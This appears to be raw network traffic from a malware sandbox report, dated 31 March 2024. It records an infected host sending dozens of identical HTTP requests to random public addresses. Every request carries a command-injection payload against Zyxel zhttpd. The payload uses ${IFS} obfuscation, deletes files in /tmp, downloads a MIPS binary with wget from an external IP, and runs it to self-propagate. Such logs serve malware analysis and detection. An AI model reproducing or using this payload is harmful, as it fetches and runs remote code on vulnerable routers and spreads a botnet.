                              Mar 31, 2024 08:41:04.493730068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              695192.168.2.134569696.238.154.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.493782043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              696192.168.2.1342940113.183.12.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.493822098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              697192.168.2.136039281.198.49.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.493870020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              698192.168.2.1354726189.192.236.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.493896961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              699192.168.2.1337238108.21.226.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.493954897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              700192.168.2.134707041.127.242.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.493985891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              701192.168.2.1333860174.206.7.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.494049072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              702192.168.2.1354862130.147.130.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.494076014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              703192.168.2.133647841.43.94.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.494103909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              704192.168.2.1337140173.174.216.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.494153976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              705192.168.2.1334216135.243.93.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.494204998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              706192.168.2.133512688.234.229.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.501749992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              707192.168.2.1354998192.86.33.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.501815081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              708192.168.2.1334760221.102.175.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.501887083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              709192.168.2.1353902212.29.126.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.501939058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              710192.168.2.1347930187.131.114.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502001047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              711192.168.2.134591664.200.102.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502022028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              712192.168.2.1354440154.187.147.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502057076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              713192.168.2.134517875.34.101.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502106905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              714192.168.2.1339890155.221.42.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502121925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              715192.168.2.1350496188.58.170.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502178907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              716192.168.2.1337292219.191.78.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502233028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              717192.168.2.135789434.120.77.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502258062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              718192.168.2.133374020.168.112.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502290010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              719192.168.2.1357136170.180.195.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502319098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              720192.168.2.1336896194.195.78.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502336025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              721192.168.2.1348042197.228.101.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502403021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              722192.168.2.1335438111.144.255.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502422094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              723192.168.2.1357578138.165.229.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502475977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              724192.168.2.135219679.75.214.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502486944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              725192.168.2.1360730128.222.56.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502542019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              726192.168.2.1343738129.178.77.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502568007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              727192.168.2.1333458161.15.165.139443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502624035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              728192.168.2.135799441.217.46.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502626896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              729192.168.2.135200864.252.189.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502664089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              730192.168.2.136018873.167.71.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502707958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              731192.168.2.1342044111.77.104.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502780914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              732192.168.2.133304419.220.22.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502782106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              733192.168.2.135664439.127.15.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502794981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              734192.168.2.1344672222.239.252.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502825975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              735192.168.2.1353508154.45.34.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502892017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              736192.168.2.1348814210.171.167.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502935886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              737192.168.2.1337914134.164.220.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.502976894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              738192.168.2.1354790144.150.151.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503019094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              739192.168.2.1354670187.170.164.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503078938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              740192.168.2.1360252170.104.241.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503107071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              741192.168.2.133540451.231.238.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503144979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              742192.168.2.1353314128.102.214.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503196955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              743192.168.2.1337908148.239.100.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503257036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              744192.168.2.1343004135.113.200.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503259897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              745192.168.2.134775891.47.1.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503309965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              746192.168.2.134763060.212.102.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503336906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              747192.168.2.1359196137.99.140.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503402948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              748192.168.2.135915235.117.39.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503412962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              749192.168.2.134449634.164.164.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503452063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              750192.168.2.1346232100.135.30.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503494024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              751192.168.2.1350516137.153.236.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503552914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              752192.168.2.13541565.68.51.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503563881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              753192.168.2.1342258189.103.160.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503587008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              754192.168.2.135530078.46.218.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503639936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              755192.168.2.134096280.152.179.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503706932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              756192.168.2.135718412.232.61.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503706932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              757192.168.2.135682459.95.43.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503747940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              758192.168.2.134225680.29.13.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503770113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              759192.168.2.1351308121.70.166.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503818989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              760192.168.2.1345936155.220.84.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503859997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              761192.168.2.135473665.77.67.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503936052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              762192.168.2.133749643.113.38.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503947020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              763192.168.2.1341284100.149.108.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.503954887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
